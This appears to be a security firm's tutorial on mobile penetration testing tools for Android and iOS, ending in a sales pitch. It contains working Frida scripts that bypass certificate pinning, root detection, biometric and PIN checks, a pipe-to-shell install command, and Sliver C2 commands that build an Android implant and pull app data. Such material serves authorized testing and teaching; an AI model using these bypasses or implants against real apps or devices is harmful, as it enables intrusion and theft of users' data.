Mobile Pentesting Toolkit: The Complete Arsenal for Android & iOS Security
From static analysis to runtime manipulation—every tool you need for professional mobile application penetration testing on Android and iOS platforms.
Mobile applications are everywhere. Banking, healthcare, enterprise—critical data flows through apps on devices we carry constantly. Yet mobile security testing remains a specialized skill that many penetration testers lack. This guide covers the complete toolkit for professional mobile application security assessments.
We'll cover tools for both Android and iOS, from static analysis through dynamic instrumentation, organized by testing phase.
Only test applications you own or have explicit written authorization to assess. Bypassing security controls on applications without permission may violate computer crime laws and app store terms of service.
Lab Environment Setup
Before diving into tools, you need a proper testing environment.
Android Setup
# Option 1: Physical device (recommended for full testing)
# - Enable Developer Options (tap Build Number 7 times)
# - Enable USB Debugging
# - Root the device (Magisk recommended)
# Option 2: Emulator
# Genymotion (recommended) - ARM translation, root by default
# Android Studio Emulator - Use x86 images with Google APIs
# Essential: Android Debug Bridge (ADB)
sudo apt install adb
adb devices # Verify connection
# Install platform-tools
adb shell pm list packages # List installed apps
adb install app.apk # Install APK
adb pull /data/app/... # Extract APK from device
Genymotion
Commercial Android emulator with excellent performance. Comes pre-rooted, supports ARM translation for apps that require it. The best choice for mobile pentesting labs.
iOS Setup
# Physical device required for most testing (emulator lacks security features)
# Jailbreak required for dynamic analysis
# Modern jailbreaks:
# - Palera1n (A8-A11 devices, iOS 15-17)
# - Dopamine (A12+ devices, iOS 15-16.6.1)
# - unc0ver (iOS 11-14.8)
# After jailbreak, install via Cydia/Sileo:
# - OpenSSH (remote access)
# - Frida (instrumentation)
# - SSL Kill Switch 2 (bypass certificate pinning)
# - AppSync Unified (install unsigned apps)
# Connect via SSH
ssh root@ # Default password: alpine
Static Analysis Tools
Static analysis examines the application without executing it. Extract the APK/IPA, decompile it, and analyze the code for vulnerabilities.
MobSF - Mobile Security Framework
MobSF
All-in-one mobile security testing framework. Performs automated static and dynamic analysis, identifies vulnerabilities, hardcoded secrets, insecure configurations, and generates comprehensive reports. Works on Android APK, iOS IPA, and source code.
# Docker installation (recommended)
docker pull opensecurity/mobile-security-framework-mobsf
docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf
# Access web interface
# http://localhost:8000
# Upload APK/IPA for analysis
# MobSF automatically:
# - Decompiles the application
# - Scans for hardcoded secrets, API keys
# - Identifies insecure permissions
# - Checks for vulnerable components
# - Analyzes network security configuration
# - Generates PDF/JSON reports
APK Analysis Tools
APKTool
Reverse engineer Android APK files. Decompiles resources to near-original form, decodes AndroidManifest.xml, and allows recompilation after modification. Essential for patching apps to inject Frida or disable security controls.
JADX
DEX to Java decompiler with GUI. Produces readable Java source code from Android applications. Better decompilation quality than many alternatives, with search functionality and export options.
# Extract APK from device
adb shell pm path com.target.app
adb pull /data/app/.../base.apk target.apk
# Decompile with APKTool
apktool d target.apk -o target_decoded
# Examine key files
cat target_decoded/AndroidManifest.xml # Permissions, components, exports
ls target_decoded/res/values/ # strings.xml often has secrets
grep -r "api_key\|password\|secret" target_decoded/
# Decompile to Java with JADX
jadx target.apk -d target_java
# Search for vulnerabilities
grep -rn "MODE_PRIVATE\|MODE_WORLD" target_java/ # Insecure file storage
grep -rn "addJavascriptInterface" target_java/ # WebView vulnerabilities
grep -rn "setAllowFileAccess" target_java/ # File access issues
grep -rn "checkServerTrusted" target_java/ # Certificate validation
iOS Static Analysis
Ghidra
NSA's reverse engineering framework. Excellent for analyzing iOS binaries (Mach-O files). Free, powerful, with scripting support for automation.
# Extract IPA (decrypted) from jailbroken device
# Using frida-ios-dump
pip install frida-tools
python dump.py "App Name"
# Or manually from device
ssh root@device "find /var/containers/Bundle/Application -name '*.app'"
scp -r root@device:/path/to/App.app ./
# Analyze binary
# Check for PIE (Position Independent Executable)
otool -hv App.app/App | grep PIE
# Check for ARC (Automatic Reference Counting)
otool -I -v App.app/App | grep objc_release
# List classes (reveals app structure)
class-dump App.app/App > classes.h
# Strings analysis
strings App.app/App | grep -i "api\|key\|token\|password"
# Check Info.plist for URL schemes, permissions
plutil -p App.app/Info.plist
Dynamic Analysis & Instrumentation
Dynamic analysis examines the application during runtime. This is where the real power lies—hooking functions, bypassing security controls, and manipulating application behavior.
Frida - Dynamic Instrumentation
Frida
The most powerful dynamic instrumentation toolkit for mobile. Inject JavaScript into running processes to hook functions, modify behavior, bypass security controls, and trace execution. Supports Android, iOS, Windows, macOS, and Linux.
# Install Frida tools
pip install frida-tools
# Android: Push frida-server to device
# Download from: https://github.com/frida/frida/releases
adb push frida-server-16.x.x-android-arm64 /data/local/tmp/frida-server
adb shell "chmod 755 /data/local/tmp/frida-server"
adb shell "/data/local/tmp/frida-server &"
# iOS: Install via Cydia/Sileo after jailbreak
# Package: re.frida.server
# List running processes
frida-ps -U
# Attach to running app
frida -U -n "App Name"
# Spawn app with Frida attached
frida -U -f com.target.app --no-pause
# Trace function calls
frida-trace -U -n "App Name" -i "open*"
// bypass_ssl_pinning.js - Bypass certificate pinning
Java.perform(function() {
var TrustManagerImpl = Java.use('com.android.org.conscrypt.TrustManagerImpl');
TrustManagerImpl.verifyChain.implementation = function(untrustedChain, trustAnchorChain, host, clientAuth, ocspData, tlsSctData) {
console.log('[+] Bypassing SSL pinning for: ' + host);
return untrustedChain;
};
});
// Usage: frida -U -f com.target.app -l bypass_ssl_pinning.js
// hook_crypto.js - Monitor encryption operations
Java.perform(function() {
var Cipher = Java.use('javax.crypto.Cipher');
Cipher.doFinal.overload('[B').implementation = function(input) {
console.log('[Cipher.doFinal] Input: ' + bytesToHex(input));
var result = this.doFinal(input);
console.log('[Cipher.doFinal] Output: ' + bytesToHex(result));
return result;
};
});
// root_detection_bypass.js - Bypass root detection
Java.perform(function() {
var RootBeer = Java.use('com.scottyab.rootbeer.RootBeer');
RootBeer.isRooted.implementation = function() {
console.log('[+] Bypassing RootBeer detection');
return false;
};
});
Objection - Runtime Mobile Exploration
Objection
Runtime mobile exploration toolkit powered by Frida. Provides pre-built commands for common tasks: SSL pinning bypass, root detection bypass, memory dumping, and more. No scripting required for most operations.
# Install
pip install objection
# Patch APK to include Frida gadget (for non-rooted devices)
objection patchapk --source app.apk
# Connect to running app
objection -g "com.target.app" explore
# Common commands in Objection REPL
android hooking list classes # List all classes
android hooking search classes api # Search for classes
android hooking list class_methods com.target.api.ApiClient
android hooking watch class_method com.target.api.ApiClient.sendRequest --dump-args
# Bypass SSL pinning
android sslpinning disable
# Bypass root detection
android root disable
# Dump memory
memory dump all dump.bin
# List activities
android hooking list activities
# Start activity
android intent launch_activity com.target.app.SecretActivity
# Keychain/Keystore dump
android keystore list
ios keychain dump
Drozer - Android Security Assessment
Drozer
Android security testing framework for finding vulnerabilities in app components. Tests exported activities, content providers, broadcast receivers, and services. Simulates a malicious app attacking the target.
# Install drozer agent on device
adb install drozer-agent.apk
# Forward port and connect
adb forward tcp:31415 tcp:31415
drozer console connect
# Package enumeration
dz> run app.package.list -f target
dz> run app.package.info -a com.target.app
dz> run app.package.attacksurface com.target.app
# Find exported components
dz> run app.activity.info -a com.target.app
dz> run app.provider.info -a com.target.app
dz> run app.broadcast.info -a com.target.app
dz> run app.service.info -a com.target.app
# Test content providers for SQL injection
dz> run scanner.provider.injection -a com.target.app
# Test for path traversal in content providers
dz> run scanner.provider.traversal -a com.target.app
# Query content provider
dz> run app.provider.query content://com.target.provider/users
# Start exported activity
dz> run app.activity.start --component com.target.app com.target.app.SecretActivity
Traffic Interception
Mobile apps communicate with backend APIs. Intercepting this traffic reveals authentication mechanisms, API structures, and potential vulnerabilities.
Burp Suite
The industry standard for web and API testing. Configure device proxy settings to route traffic through Burp. Essential for analyzing API calls, modifying requests, and testing for injection vulnerabilities.
# 1. Configure Burp to listen on all interfaces
# Proxy > Options > Add > Bind to address: All interfaces, Port: 8080
# 2. Android: Configure device proxy
# Settings > WiFi > Long press network > Modify > Advanced
# Proxy: Manual, Host: , Port: 8080
# 3. Install Burp CA certificate
# Export: Proxy > Options > Import/Export CA Certificate
# Android: Push to device, install via Security settings
adb push burp-ca.der /sdcard/
# Go to Settings > Security > Install from storage
# 4. For apps with certificate pinning, use Frida bypass
frida -U -f com.target.app -l ssl_bypass.js
# Alternative: Objection
objection -g com.target.app explore
android sslpinning disable
# iOS: Similar process
# Install CA via Safari, trust in Settings > General > About > Certificate Trust
Automated Scanning
| Tool | Platform | Type | Best For |
|---|---|---|---|
| MobSF | Android, iOS | Static + Dynamic | Comprehensive automated analysis |
| Quark Engine | Android | Static | Malware analysis, behavior detection |
| Androguard | Android | Static | Python-based analysis, scripting |
| dex2jar | Android | Static | Convert DEX to JAR for analysis |
| Nuclei Mobile | Android, iOS | Static | Template-based vulnerability scanning |
Common Vulnerability Testing
Insecure Data Storage
# Android: Check shared preferences
adb shell "run-as com.target.app cat /data/data/com.target.app/shared_prefs/*.xml"
# Check SQLite databases
adb shell "run-as com.target.app ls /data/data/com.target.app/databases/"
adb pull /data/data/com.target.app/databases/app.db
sqlite3 app.db ".tables"
sqlite3 app.db "SELECT * FROM users;"
# iOS: Check for sensitive files
# Plist files
find /var/mobile/Containers/Data/Application/ -name "*.plist" 2>/dev/null | xargs grep -l password
# SQLite databases
find /var/mobile/Containers/Data/Application/ -name "*.sqlite" -o -name "*.db"
# Keychain analysis (objection)
ios keychain dump
Authentication Bypass
// Bypass biometric authentication
Java.perform(function() {
var BiometricPrompt = Java.use('androidx.biometric.BiometricPrompt$AuthenticationCallback');
BiometricPrompt.onAuthenticationSucceeded.implementation = function(result) {
console.log('[+] Biometric bypass - forcing success');
this.onAuthenticationSucceeded(result);
};
});
// Bypass PIN/password check
Java.perform(function() {
var AuthManager = Java.use('com.target.app.AuthManager');
AuthManager.validatePin.implementation = function(pin) {
console.log('[+] PIN entered: ' + pin);
return true; // Always return success
};
});
Red Team C2 Frameworks
For advanced adversary simulation and post-exploitation on mobile and beyond, modern C2 frameworks provide the infrastructure for coordinated attacks.
These frameworks are used by both red teams and threat actors. Use only with proper authorization.
| Framework | Type | Key Features |
|---|---|---|
| Cobalt Strike | Commercial | Industry standard, Beacon payloads, Malleable C2, extensive documentation |
| Sliver | Open Source | Modern alternative, HTTP/DNS/WireGuard C2, cross-platform implants |
| Havoc | Open Source | Modern C2, evasion-focused, modular, active development |
| Mythic | Open Source | Cross-platform, multiple agents, web UI, collaborative |
| Brute Ratel C4 | Commercial | Evasion-focused, kernel-level capabilities, detection bypass |
# Install Sliver
curl https://sliver.sh/install | sudo bash
# Start Sliver server
sliver-server
# Generate implant
sliver > generate --mtls 192.168.1.100 --os android --arch arm64 --save /tmp/
# Start listener
sliver > mtls --lport 8888
# Once implant executes and connects
sliver > use [session-id]
sliver (SESSION) > info
sliver (SESSION) > screenshot
sliver (SESSION) > download /data/data/com.target.app/
Mobile Pentesting Methodology
A structured approach ensures comprehensive coverage:
- Reconnaissance - Identify app version, permissions, components, backend APIs
- Static Analysis - Decompile, search for secrets, analyze code flow
- Dynamic Analysis - Runtime instrumentation, hook sensitive functions
- Network Analysis - Intercept traffic, test API security, bypass pinning
- Data Storage - Check for sensitive data in files, databases, keychain
- Authentication - Test login flows, session management, biometrics
- Authorization - Test access controls, IDOR, privilege escalation
- Cryptography - Verify encryption implementation, key storage
- Platform-Specific - IPC, URL schemes, deep links, WebViews
Conclusion
Mobile application security requires specialized tools and techniques. The combination of static analysis (MobSF, JADX), dynamic instrumentation (Frida, Objection), and network interception (Burp Suite) provides comprehensive coverage. Master these tools and you can assess any mobile application's security posture.
The mobile threat landscape continues to evolve. Applications increasingly implement certificate pinning, root detection, and anti-tampering controls. The tools in this guide bypass these protections—because if testers can bypass them, so can attackers.
For professional mobile application penetration testing, contact Brickell Technologies. We test Android and iOS applications using the techniques covered here, delivering actionable findings that improve your security posture.
- Frida - Dynamic instrumentation toolkit
- Objection - Runtime mobile exploration
- MobSF - Mobile Security Framework
- Drozer - Android security testing
- JADX - DEX to Java decompiler
- APKTool - APK reverse engineering
- Sliver - Open source C2 framework
- Havoc - Modern C2 framework
- Mythic - Cross-platform C2
- OWASP MAS - Mobile Application Security
- HackTricks - Comprehensive security reference